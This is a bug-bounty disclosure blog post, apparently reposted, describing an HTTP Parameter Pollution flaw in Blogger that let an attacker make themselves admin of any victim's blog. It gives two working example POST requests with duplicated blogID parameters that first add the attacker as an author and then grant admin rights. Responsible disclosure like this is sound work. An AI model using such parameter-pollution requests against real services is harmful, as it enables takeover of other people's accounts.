How I Hacked Any Blogger Account:Hackers's words

22:41:00
Blogger-Logo

This is the first post on my blog and will also be the first post to detail my ability to find security vulnerabilities in the Google Reward Program.
Over the last 2 months, I have participated in the Google Reward Program and found some relatively serious vulnerabilities.
(As a disclaimer, I want to say that Google has a security team full of consummate and brilliant professionals. It is truly amazing how much Google cares about security and how amazing their work is in regard to securing their sites. Thanks Adam of the Google Security Team for allowing me to showcase my skills).
The first vulnerability that I want to reveal is a critical one in the Blogger platform (a Google Service). This vulnerability could be utilized by an attacker to gain administrator privilege over any Blogger account (categorized as a “Permission” issue).
The details regarding the Blogger service issue are as follows.
I located an HTTP Parameter Pollution vulnerability in Blogger that permits an attacker to designate themselves as an administrator on a victim’s Blogger account.

Technical details:

Below, you’ll find the steps for gaining admin control permissions over virtually any Blogger account:
1.
The attacker uses the invite author options in Blogger (i.e. add authors).
Vulnerability location:

POST /add-authors.do HTTP/1.1
Request:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite
As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)


The server examines the first blogid value and then executes the attacker’s second blogid value.

2.
The attacker will then receive an email to confirm him as an author (author invitation link). The attacker will be added as an author on the victim’s account.

3.
It is now possible to alter the attacker permission so that it rises from a simple author to an actual admin.
Vulnerability Location:
POST /team-member-modify.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges

And?
mario2gameover
Watch Video!

Source:breaksecurity.com

Leave a Comment

No comments

Subscribe to: Post Comments ( Atom )
Powered by Blogger.